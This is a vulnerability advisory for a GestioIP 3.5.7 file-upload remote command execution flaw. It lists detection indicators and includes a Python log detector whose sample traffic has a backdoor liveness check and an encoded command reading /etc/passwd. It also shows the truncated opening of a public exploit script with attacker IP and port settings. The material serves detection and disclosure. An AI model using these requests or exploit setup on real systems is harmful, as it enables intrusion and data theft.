CVE-2024-48760
Published 2025-01-14
Priority P2 · 78 · critical · 9.8 (CVSS 3.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Note: read the PR:N component together with the credential caveat under Detection & IOCs: exploitation needs admin credentials unless the admin account is configured with no authentication.
Exploit: public (Exploit-DB and Metasploit entries below)
EPSS: 45.11% (98.6th percentile)
An issue in GestioIP v3.5.7 allows a remote attacker to execute arbitrary code via the file upload function. The attacker can upload a malicious perlcmd.cgi file that overwrites the original upload.cgi file, enabling remote command execution.
Affected
1 range (version bounds are not recorded on this page; the advisory and both exploits name v3.5.7)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gestioip | gestioip | — | — |
Detection & IOCs (extracted from sources)
- Monitor for HTTP POST requests to /gestioip/api/upload.cgi where the uploaded filename is 'upload.cgi'; this indicates the attacker is overwriting the upload handler with a backdoor.
- Detect HTTP GET requests to /gestioip/api/upload.cgi with a QUERY_STRING parameter. The backdoor executes the query string as a shell command, so any GET with a query string to this endpoint is suspicious post-compromise.
- Alert on the backdoor liveness check: an HTTP GET to /gestioip/api/upload.cgi?whoami returning 'www-data' in the response body indicates the backdoor is active.
- The backdoor CGI script decodes URL-encoded shell metacharacters (%20, %3b, %7c, %27, %22, %5D, %5B) from QUERY_STRING before executing them; look for these encoded characters in GET requests to upload.cgi.
- The multipart POST upload uses form fields 'file_name' and 'leases_file'; a POST to upload.cgi with a file_name value of 'upload.cgi' is a strong indicator of exploitation.
- If GestioIP is configured with no authentication for the admin account, the vulnerability is exploitable without credentials; monitor unauthenticated POSTs to /gestioip/api/upload.cgi.
- Exploitation requires admin credentials unless GestioIP is configured with no authentication for the admin account, in which case no credentials are needed.
- The vulnerability is specific to GestioIP version 3.5.7; verify the deployed version before applying detections.
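The detection points above can be checked mechanically against any proxy or WAF log that records request bodies. The Python script below is an added example, not code from this page or from either exploit: it parses the multipart POST (flagging a file_name of upload.cgi or a Perl script in leases_file), flags GETs with a query string to the handler (decoding the URL-encoded metacharacters listed above), and recognises the whoami liveness check. The HttpEvent record shape, its authenticated flag and all the sample traffic are constructed for the example.

```python
import email
import re
from dataclasses import dataclass
from urllib.parse import unquote, urlsplit

# Path of the GestioIP upload handler that the PoC overwrites with a Perl backdoor.
TARGET_PATH = "/gestioip/api/upload.cgi"
# URL-encoded shell metacharacters the backdoor decodes from QUERY_STRING before executing it.
ENCODED_META = re.compile(r"%(20|3b|7c|27|22|5d|5b)", re.IGNORECASE)


@dataclass
class HttpEvent:
    """One request/response pair as a proxy or WAF with body logging would record it (assumed shape)."""
    src: str
    method: str
    uri: str
    content_type: str = ""
    body: bytes = b""
    authenticated: bool = False   # did the request carry a valid GestioIP session or basic-auth?
    response_body: bytes = b""


def multipart_fields(content_type: str, body: bytes) -> dict:
    """Parse a multipart/form-data body with the stdlib email parser: {name: (filename|None, bytes)}."""
    msg = email.message_from_bytes(b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    fields = {}
    if not msg.is_multipart():
        return fields
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_param("name", header="content-disposition")
        if name is None:
            continue
        fields[name] = (part.get_filename(), part.get_payload(decode=True) or b"")
    return fields


def analyse(ev: HttpEvent) -> list:
    """Return alert strings for one event; an empty list means nothing matched."""
    alerts = []
    parts = urlsplit(ev.uri)
    if parts.path != TARGET_PATH:
        return alerts
    if ev.method == "POST" and ev.content_type.lower().startswith("multipart/form-data"):
        fields = multipart_fields(ev.content_type, ev.body)
        file_name = fields.get("file_name", (None, b""))[1].decode(errors="replace").strip()
        upload_name, upload_data = fields.get("leases_file", (None, b""))
        # Exploit signature: the upload is told to land as upload.cgi, replacing the handler.
        if file_name == "upload.cgi" or upload_name == "upload.cgi":
            alerts.append("POST overwrites the upload handler (file_name/leases_file = upload.cgi)")
        # A DHCP leases file never starts with a shebang; the backdoor does.
        if upload_data.lstrip().startswith(b"#!") and b"perl" in upload_data[:64].lower():
            alerts.append("leases_file payload is a Perl script, not a leases file")
        if not ev.authenticated:
            alerts.append("unauthenticated POST to upload.cgi")
    elif ev.method == "GET" and parts.query:
        # The legitimate handler is a POST upload; the backdoor runs QUERY_STRING as a shell command.
        alerts.append(f"GET with query string to upload.cgi: {parts.query!r}")
        if ENCODED_META.search(parts.query):
            alerts.append(f"URL-encoded shell metacharacters, decodes to {unquote(parts.query)!r}")
        if parts.query == "whoami" and b"www-data" in ev.response_body:
            alerts.append("backdoor liveness check answered with www-data")
    return alerts


# --- constructed sample traffic (not captured from any real system) ---
BOUNDARY = "demoboundary42"
MP = f"multipart/form-data; boundary={BOUNDARY}"


def build_multipart(fields) -> bytes:
    """Build a multipart/form-data body from [(name, filename_or_None, data_bytes)]."""
    out = b""
    for name, filename, data in fields:
        disp = f'Content-Disposition: form-data; name="{name}"'
        if filename:
            disp += f'; filename="{filename}"'
        out += f"--{BOUNDARY}\r\n{disp}\r\n\r\n".encode() + data + b"\r\n"
    return out + f"--{BOUNDARY}--\r\n".encode()


SAMPLE_EVENTS = [
    # benign: an authenticated admin imports a real DHCP leases file
    HttpEvent("10.0.0.7", "POST", TARGET_PATH, MP, build_multipart([
        ("file_name", None, b"dhcpd.leases"), ("leases_file", "dhcpd.leases", b"lease 10.0.0.50 {\n}\n")]),
        authenticated=True),
    # exploitation: backdoor written over the upload handler, no credentials presented
    HttpEvent("203.0.113.9", "POST", TARGET_PATH, MP, build_multipart([
        ("file_name", None, b"upload.cgi"),
        ("leases_file", "perlcmd.cgi", b"#!/usr/bin/perl -w\n# (backdoor body omitted)\n")])),
    # post-compromise: liveness check, then an encoded command
    HttpEvent("203.0.113.9", "GET", TARGET_PATH + "?whoami", response_body=b"www-data\n"),
    HttpEvent("203.0.113.9", "GET", TARGET_PATH + "?id%3bcat%20/etc/passwd"),
    # unrelated traffic elsewhere in the application
    HttpEvent("10.0.0.7", "GET", "/gestioip/index.cgi?page=home"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for alert in analyse(ev):
            print(f"{ev.src:<14} {alert}")
```

Running the file prints the alerts for the constructed events; the benign leases import and the unrelated GET produce none. In production, feed analyse() from a log source that retains POST bodies, since a plain access log cannot show the file_name field, and confirm the deployed version (last note above) before tuning the rules.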
No detection rules found.
Exploit-DB
GestioIP 3.5.7 - Remote Command Execution (RCE)
exploitdb · 2025-04-14 · CVSS 9.8
---
```python
# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-48760
import requests
import sys

# Config: GestioIP admin credentials, target host, and the attacker-side address/port
username = "gipadmin"
password = "PASSWORD"
domain = "localhost"
local_ip = "10.20.0.1"
local_port = 443
# Upload handler that the uploaded perlcmd.cgi overwrites
target_url = f"http://{domain}/gestioip/api/upload.cgi"

# CGI Backdoor Perl (listing truncated on the source page)
backdoor_code = """#!/usr/bin/perl -w
```
Metasploit
GestioIP 3.5.7 Remote Command Execution
metasploit · published 2025-01-14
This module exploits command execution via file upload. If GestioIP is configured to use no authentication for the admin account, no password is required to exploit the vulnerability. Otherwise, an authenticated user with admin rights on the web site is required.